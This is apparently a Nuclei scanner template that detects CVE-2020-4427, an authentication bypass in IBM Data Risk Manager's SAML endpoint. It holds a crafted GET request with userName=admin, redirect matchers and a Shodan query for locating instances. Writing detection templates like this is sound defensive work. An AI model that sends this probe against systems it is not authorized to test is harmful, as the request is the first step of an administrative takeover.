id: CVE-2020-4427

info:
  name: IBM Data Risk Manager - Authentication Bypass via SAML
  author: ritikchaddha
  severity: critical
  description: |
    IBM Data Risk Manager versions 2.0.1 through 2.0.6 are vulnerable to authentication bypass when configured with SAML authentication. A remote attacker can bypass security restrictions by sending a specially crafted HTTP request to the SAML idpSelection endpoint, allowing them to skip the authentication process and gain full administrative access to the system.
  impact: |
    Unauthenticated attackers can bypass authentication via the SAML endpoint and gain full administrative access to IBM Data Risk Manager, compromising all managed data risk information.
  remediation: |
    Apply the latest security updates and patches provided by IBM for Data Risk Manager.
  reference:
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ibm_drm_rce.rb
    - https://seclists.org/fulldisclosure/2020/Apr/33
    - https://www.ibm.com/support/pages/node/6206875
    - https://nvd.nist.gov/vuln/detail/CVE-2020-4427
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-4427
    cwe-id: CWE-287
    epss-score: 0.9274
    epss-percentile: 0.99765
    cpe: cpe:2.3:a:ibm:data_risk_manager:*:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 1
    vendor: ibm
    product: data_risk_manager
    shodan-query: title:"IBM Data Risk Manager"
  tags: cve,cve2020,ibm,saml,auth-bypass,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/albatross/saml/idpSelection?id={{randstr}}&userName=admin"

    matchers-condition: and
    matchers:
      - type: word
        part: location
        words:
          - "localhost:8765"
          - "saml/idpSelection"
        condition: and

      - type: status
        status:
          - 302

    extractors:
      - type: kval
        part: header
        kval:
          - location
# digest: 4a0a00473045022100fc8a31457e6ab5d70adf77e73bfc44ae462b321ae7f07fac0d6f49c5c15ed0d10220105dae6dc665ffaf3184f364df805f99f791b9d0857b3ba63aa42b46dcdedae4:922c64590222798bb761d5b6d8e72950